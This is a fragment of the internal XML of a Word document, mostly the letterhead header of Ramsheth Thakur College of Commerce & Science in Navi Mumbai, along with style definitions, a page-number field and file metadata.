      <w:t>Subject:</w:t>
    </w:r>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii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948BF" w14:textId="77777777" w:rsidR="00210690" w:rsidRDefault="00210690" w:rsidP="00570EE1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4D8715A8" w14:textId="77777777" w:rsidR="00210690" w:rsidRDefault="00210690" w:rsidP="00570E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95" w:type="dxa"/>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="2226"/>
      <w:gridCol w:w="6577"/>
      <w:gridCol w:w="992"/>
    </w:tblGrid>
    <w:tr w:rsidR="006E5BE8" w14:paraId="0B8DE076" w14:textId="77777777" w:rsidTr="00A230A5">
      <w:trPr>
        <w:trHeight w:val="1022"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="22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BD4EBE2" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRDefault="006E5BE8" w:rsidP="00570EE1">
          <w:r w:rsidRPr="0025465D">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia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59264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="743BFFCE" wp14:editId="3CD177EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>245745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>63500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="885825" cy="742950"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="46" name="Picture 46" descr="Logo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25465D">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="3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F27CC3" wp14:editId="53A9317C">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="margin">
                      <wp:posOffset>68580</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>829945</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="1247775" cy="233045"/>
                    <wp:effectExtent l="0" t="0" r="28575" b="14605"/>
                    <wp:wrapSquare wrapText="bothSides"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47775" cy="23304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CDC4A6D" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRPr="008B4D6F" w:rsidRDefault="006E5BE8" w:rsidP="00570EE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sz w:val="16"/>
                                    <w:szCs w:val="16"/>
                                    <w:lang w:val="en-US"/>
                                  </w:rPr>
                                  <w:drawing>
                                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7531865E" wp14:editId="07FCBD9C">
                                      <wp:extent cx="1039495" cy="185420"/>
                                      <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
                                      <wp:docPr id="47" name="Picture 4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/>
                                              <pic:cNvPicPr/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39495" cy="1854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4AF27C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margin-left:5.4pt;margin-top:65.35pt;width:98.25pt;height:18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" fillcolor="white [3201]" strokecolor="white [3212]" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="1CDC4A6D" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRPr="008B4D6F" w:rsidRDefault="006E5BE8" w:rsidP="00570EE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  <w:lang w:val="en-US"/>
                            </w:rPr>
                            <w:drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7531865E" wp14:editId="07FCBD9C">
                                <wp:extent cx="1039495" cy="185420"/>
                                <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
                                <wp:docPr id="47" name="Picture 4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39495" cy="1854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tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="660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226A0D0D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sz w:val="8"/>
              <w:szCs w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve">Janardan Bhagat </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>Shikshan</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>Prasarak</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve"> Sanstha's</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="59837E4B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b/>
              <w:bCs/>
              <w:color w:val="800000"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="800000"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>RAMSHETH THAKUR COLLEGE</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2490E388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b/>
              <w:bCs/>
              <w:color w:val="800000"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="800000"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>OF COMMERCE &amp; SCIENCE</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65759B8A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color w:val="0070C0"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t>Plot no-1, Sector-33, Kharghar, Navi Mumbai – 410210</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BDCF3BE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sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>Affiliated to University of Mumbai</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="167FAE78" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRPr="00B7099C" w:rsidRDefault="006E5BE8" w:rsidP="00570EE1">
          <w:pPr>
            <w:ind w:left="809" w:hanging="992"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>Accredited ‘A’ Grade by NAAC</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B55018B" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRDefault="006E5BE8" w:rsidP="00570EE1">
          <w:pPr>
            <w:ind w:left="809" w:hanging="992"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r w:rsidRPr="00B7099C">
            <w:rPr>
              <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>ISO (9001:2015) &amp; (14001:2015) Certified</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="994" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="47290411" w14:textId="6A0CE3E3" w:rsidR="006E5BE8" w:rsidRPr="00E80E93" w:rsidRDefault="00B073E0" w:rsidP="00570EE1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B8F6198" wp14:editId="198B2762">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-29787</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>319232</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="540327" cy="5334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0327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CC3761" w14:textId="23E3EF98" w:rsidR="00B073E0" w:rsidRPr="00B073E0" w:rsidRDefault="00B073E0" w:rsidP="00B073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B073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fldChar w:fldCharType="begin"/>
                                </w:r>
                                <w:r w:rsidRPr="00B073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instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
                                </w:r>
                                <w:r w:rsidRPr="00B073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fldChar w:fldCharType="separate"/>
                                </w:r>
                                <w:r w:rsidR="005B10E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</w:rPr>
                                  <w:t>13</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00B073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type w14:anchorId="0B8F61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margin-left:-2.35pt;margin-top:25.15pt;width:42.55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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="1ECC3761" w14:textId="23E3EF98" w:rsidR="00B073E0" w:rsidRPr="00B073E0" w:rsidRDefault="00B073E0" w:rsidP="00B073E0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B073E0"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  <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r w:rsidRPr="00B073E0"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  <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
                          </w:r>
                          <w:r w:rsidRPr="00B073E0">
                            <w:rPr>
                              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r w:rsidR="005B10EF"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</w:rPr>
                            <w:t>13</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00B073E0"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E5BE8" w:rsidRPr="00E80E93">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Page No</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5CE8D200" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRPr="00570EE1" w:rsidRDefault="006E5BE8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AAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73121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B5E31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3EAB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B48A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4390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A505F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4082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CBB"/>
    <w:rsid w:val="00014F81"/>
    <w:rsid w:val="000A0869"/>
    <w:rsid w:val="000C60E5"/>
    <w:rsid w:val="00170CF1"/>
    <w:rsid w:val="001A6A14"/>
    <w:rsid w:val="00210690"/>
    <w:rsid w:val="002362D2"/>
    <w:rsid w:val="00266E75"/>
    <w:rsid w:val="002C1F6D"/>
    <w:rsid w:val="003613FD"/>
    <w:rsid w:val="00423294"/>
    <w:rsid w:val="0042575A"/>
    <w:rsid w:val="00456A70"/>
    <w:rsid w:val="004919ED"/>
    <w:rsid w:val="0051507C"/>
    <w:rsid w:val="00570EE1"/>
    <w:rsid w:val="005B10EF"/>
    <w:rsid w:val="00667DE9"/>
    <w:rsid w:val="006E5BE8"/>
    <w:rsid w:val="00761BE9"/>
    <w:rsid w:val="007A0564"/>
    <w:rsid w:val="007E4A8C"/>
    <w:rsid w:val="007E6D9E"/>
    <w:rsid w:val="008D0F6F"/>
    <w:rsid w:val="009338A4"/>
    <w:rsid w:val="00A044EF"/>
    <w:rsid w:val="00A230A5"/>
    <w:rsid w:val="00A360EB"/>
    <w:rsid w:val="00A411BC"/>
    <w:rsid w:val="00A84841"/>
    <w:rsid w:val="00AF0D29"/>
    <w:rsid w:val="00B0590C"/>
    <w:rsid w:val="00B073E0"/>
    <w:rsid w:val="00B30E2B"/>
    <w:rsid w:val="00C1753C"/>
    <w:rsid w:val="00C210D2"/>
    <w:rsid w:val="00C24A21"/>
    <w:rsid w:val="00C94466"/>
    <w:rsid w:val="00C955DF"/>
    <w:rsid w:val="00D83C25"/>
    <w:rsid w:val="00D90D7F"/>
    <w:rsid w:val="00E15045"/>
    <w:rsid w:val="00E97312"/>
    <w:rsid w:val="00F10C9D"/>
    <w:rsid w:val="00F2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8CF40"/>
  <w15:docId w15:val="{C7B17278-E350-4C66-BB79-C74E63EC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70E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EE1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00570E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EE1"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00570EE1"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"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0D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0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7E4A8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7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6674">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="150"/>
          <w:marBottom w:val="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17293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rickbuzz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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rtccs.co.in/index.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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31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Aditya Khapare</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2026-03-05T14:40:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-24T18:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>